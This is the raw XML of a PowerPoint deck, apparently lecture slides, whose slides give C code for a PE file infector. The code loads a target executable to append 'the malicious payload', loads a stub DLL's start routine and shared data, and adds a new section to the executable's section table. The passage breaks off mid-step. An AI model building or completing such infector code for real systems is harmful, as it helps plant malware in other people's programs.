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Lst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId46"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId44"/>
    <p:sldId id="263" r:id="rId45"/>
    <p:sldId id="665" r:id="rId47"/>
    <p:sldId id="642" r:id="rId48"/>
    <p:sldId id="643" r:id="rId49"/>
    <p:sldId id="644" r:id="rId50"/>
    <p:sldId id="729" r:id="rId51"/>
    <p:sldId id="666" r:id="rId52"/>
    <p:sldId id="691" r:id="rId53"/>
    <p:sldId id="690" r:id="rId54"/>
    <p:sldId id="692" r:id="rId55"/>
    <p:sldId id="743" r:id="rId56"/>
    <p:sldId id="744" r:id="rId57"/>
    <p:sldId id="746" r:id="rId58"/>
    <p:sldId id="747" r:id="rId59"/>
    <p:sldId id="749" r:id="rId60"/>
    <p:sldId id="750" r:id="rId61"/>
    <p:sldId id="751" r:id="rId62"/>
    <p:sldId id="689" r:id="rId63"/>
    <p:sldId id="693" r:id="rId64"/>
    <p:sldId id="703" r:id="rId65"/>
    <p:sldId id="752" r:id="rId66"/>
    <p:sldId id="753" r:id="rId67"/>
    <p:sldId id="754" r:id="rId68"/>
    <p:sldId id="755" r:id="rId69"/>
    <p:sldId id="756" r:id="rId70"/>
    <p:sldId id="757" r:id="rId71"/>
    <p:sldId id="696" r:id="rId72"/>
    <p:sldId id="697" r:id="rId73"/>
    <p:sldId id="698" r:id="rId74"/>
    <p:sldId id="699" r:id="rId75"/>
    <p:sldId id="700" r:id="rId76"/>
    <p:sldId id="637" r:id="rId77"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId81"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId8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A7AF"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="FADBD8"/>
    <a:srgbClr val="37BECC"/>
    <a:srgbClr val="D7F2F5"/>
    <a:srgbClr val="E74C3C"/>
    <a:srgbClr val="CA3E9D"/>
    <a:srgbClr val="D12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4123"/>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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag339.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1.fntdata"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster7.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33.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide32.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide24.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide23.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster5.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster4.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.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image" Target="../media/image5.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image" Target="../media/image4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag215.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8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8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tags" Target="../tags/tag28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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28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28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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28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5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag291.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37.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag295.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><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96.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag228.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag227.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag226.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tags" Target="../tags/tag234.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag233.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag232.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag231.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag230.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag229.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag220.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9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9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8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag303.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag311.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag310.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag309.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag308.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag307.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image" Target="../media/image6.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag315.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag314.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag313.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag312.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag304.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12.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag318.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag317.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag316.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.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12.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag321.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag320.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag319.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12.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag324.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag323.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag322.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12.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag327.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag326.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag325.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag335.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag334.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag333.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag332.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag331.xml"/><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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide24.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag338.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag337.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag336.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag253.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag252.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag251.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag247.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag246.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag255.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.svg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag254.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24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tags" Target="../tags/tag257.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag256.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tags" Target="../tags/tag259.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag258.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag261.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag260.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag269.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag268.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag267.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag271.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag270.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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag283.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tags" Target="../tags/tag27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2023.09.21</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custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="995998" y="1095375"/>
            <a:ext cx="10200005" cy="5269230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>VOID LoadExeFile(LPCSTR FileName)</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 If exist，then open the file. Here we want to read the infected program</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HANDLE FileHandle = CreateFileA(FileName, GENERIC_READ, NULL,</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NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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 Get the size of the file because we want to add the malicious payload to its end.</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FileSize = GetFileSize(FileHandle, NULL);</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FileBase = (DWORD)calloc(FileSize, sizeof(BYTE));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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 load the infected program to a buffer</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DWORD Read = 0;</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ReadFile(FileHandle, (LPVOID)FileBase, FileSize, &amp;Read, NULL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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 close the file</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CloseHandle(FileHandle);</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p:txBody>
      </p:sp>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 Load infected program</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p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331153" y="1263015"/>
            <a:ext cx="11553190" cy="4892675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>VOID LoadDllStub(LPCSTR FileName)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 Load the module into the current memory without executing DllMain</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DllBase = (DWORD)LoadLibraryExA(FileName, NULL, DONT_RESOLVE_DLL_REFERENCES);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pP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 Obtain the start function from the dll and calculate its intra-section offset </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//(load base address + section base address + intra-section offset)</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Start = (DWORD)GetProcAddress((HMODULE)DllBase, "start");</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StartOffset = Start - DllBase - GetSection(DllBase, ".text")-&gt;VirtualAddress;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pP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 Share Data</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ShareData = (PSHAREDATA)GetProcAddress((HMODULE)DllBase, "ShareData");</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custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1361123" y="1219835"/>
            <a:ext cx="9469755" cy="4939030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>VOID AddSection(LPCSTR SectionName, LPCSTR SrcName)</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 1. Get the address of the last section in the section table</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auto LastSection = &amp;IMAGE_FIRST_SECTION(NtHeader(FileBase))</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[FileHeader(FileBase)-&gt;NumberOfSections - 1];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 2. Add the number of sections saved in the file header by 1</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FileHeader(FileBase)-&gt;NumberOfSections += 1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 3. Find the position of the newly added section through the old last section</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auto NewSection = LastSection + 1;</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memset(NewSection, 0, sizeof(IMAGE_SECTION_HEADER));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 4.  Find the section we need to copy from the dll</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auto SrcSection = GetSection(DllBase, SrcName);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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 Add a new section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Implementation-Add a new section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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="708025" y="1053465"/>
            <a:ext cx="10775950" cy="5315585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                // 5. Copy the complete information of the source section to the new section</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	memcpy(NewSection, SrcSection, sizeof(IMAGE_SECTION_HEADER));</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6. Set the section name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memcpy(NewSection-&gt;Name, SectionName, 7);</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7. Set the RVA of the new section  = the RVA of the old last section + aligned memory size</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	NewSection-&gt;VirtualAddress = LastSection-&gt;VirtualAddress +</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Alignment(LastSection-&gt;Misc.VirtualSize, OptHeader(FileBase)-&gt;SectionAlignment);</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8. Set the FOA of the new section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
